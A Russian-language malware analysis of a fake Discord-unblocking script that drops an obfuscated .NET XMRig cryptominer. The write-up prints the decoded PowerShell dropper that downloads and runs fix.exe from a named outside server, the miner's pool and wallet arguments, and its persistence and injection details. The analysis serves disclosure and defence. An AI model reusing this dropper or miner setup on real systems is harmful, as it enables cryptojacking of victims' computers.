Discord Phantom Miner - Анализ вредоносного ПО, замаскированного под разблокировку Discord
Введение
Недавно пользователь Telegram под ником @belka_e поделился скриншотом в чате poxek, который привлек внимание к подозрительному скрипту. Этот скрипт утверждал, что может обходить блокировки Discord в России. Однако при более тщательном изучении выяснилось, что программа скачивала и выполняла полезную нагрузку в памяти.
Скачивание происходило с адреса:
1
ayugram.temp.swtest.ru/install.ps1
Этот файл PowerShell содержал полезную нагрузку, закодированную в Base64. После декодирования был выявлен вредоносный код.
Технический анализ
Декодированная полезная нагрузка
1
2
3
4
5
6
7
8
$username = $env:USERNAME
$url = "http://ayugram.temp.swtest.ru/fix"
$output = "C:\Users\$username\fix.exe"
Start-Sleep -Seconds 1
Invoke-WebRequest -Uri $url -OutFile $output
Start-Sleep -Seconds 5
Start-Process -FilePath $output
Этот скрипт скачивает и выполняет файл под названием fix.exe с удаленного сервера. После анализа было выяснено, что это бинарный файл .NET, обфусцированный с помощью ConfuserEx 1.0.0.
Обфускация: ConfuserEx 1.0.0
Определив, что fix.exe является бинарным файлом .NET, я столкнулся с большими трудностями из-за обфускации, примененной ConfuserEx 1.0.0. Следуя инструкциям из UnconfuserExTools Repository, мне удалось обратить обфускацию и начать анализировать поведение программы.
Техники антиотладки
Первая часть бинарного файла проверяет, прикреплен ли отладчик или установлены ли переменные окружения, связанные с отладкой. В dnSpy вы можете отредактировать эти инструкции и заполнить их операциями NOP, чтобы обойти меры антиотладки.
Механизм сохранения и закрепления
Вредоносное ПО сохраняет себя на диске в следующем месте:
1
C:\Users\<username>\AppData\Roaming\winupdater.exe
Затем оно создает запланированное задание с помощью schtasks с именем MicrosoftEdgeUpdate, что позволяет запускать вредоносное ПО с определенной регулярностью.
Полезная нагрузка майнера XMRig
После закрепления вредоносная программа извлекает полезную нагрузку из своих ресурсов: криптомайнер XMRig.
Поведение программы:
- Мониторинг процессов: Прежде чем запустить процесс майнинга, вредоносная программа проверяет, запущены ли Диспетчер задач или Process Hacker. Если любой из этих инструментов обнаружен, программа завершает процесс майнинга, чтобы избежать обнаружения (на случай, если процесс майнинга уже был запущен).
- Инъекция в ngentask.exe: Программа запускает следующий процесс:
1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
Затем она выделяет память в этом процессе и расшифровывает полезную нагрузку майнера XMRig в выделенное пространство.
- Запуск майнера: Майнер запускается с следующими параметрами:
1
--algo rx/0 --donate-level 0 --max-cpu-usage 25 -o mine.bmpool.org:6004 -u 7121405
Эта конфигурация позволяет программе майнить Monero (XMR) с использованием 25% мощности процессора, направляя полученную криптовалюту на кошелек злоумышленника.
Заключение
Этот анализ показал, что вредоносное ПО не только закрепляется в системе через запланированные задания, но и использует несколько продвинутых методов для избежания обнаружения:
- Антиотладочные меры помогают предотвратить реверс-инжиниринг.
- Программа использует скрытые методы закрепления через задачу MicrosoftEdgeUpdate.
- Вредоносное ПО разворачивает криптомайнер XMRig, внедренный в процесс .NET, чтобы избежать обнаружения и работать в фоновом режиме.










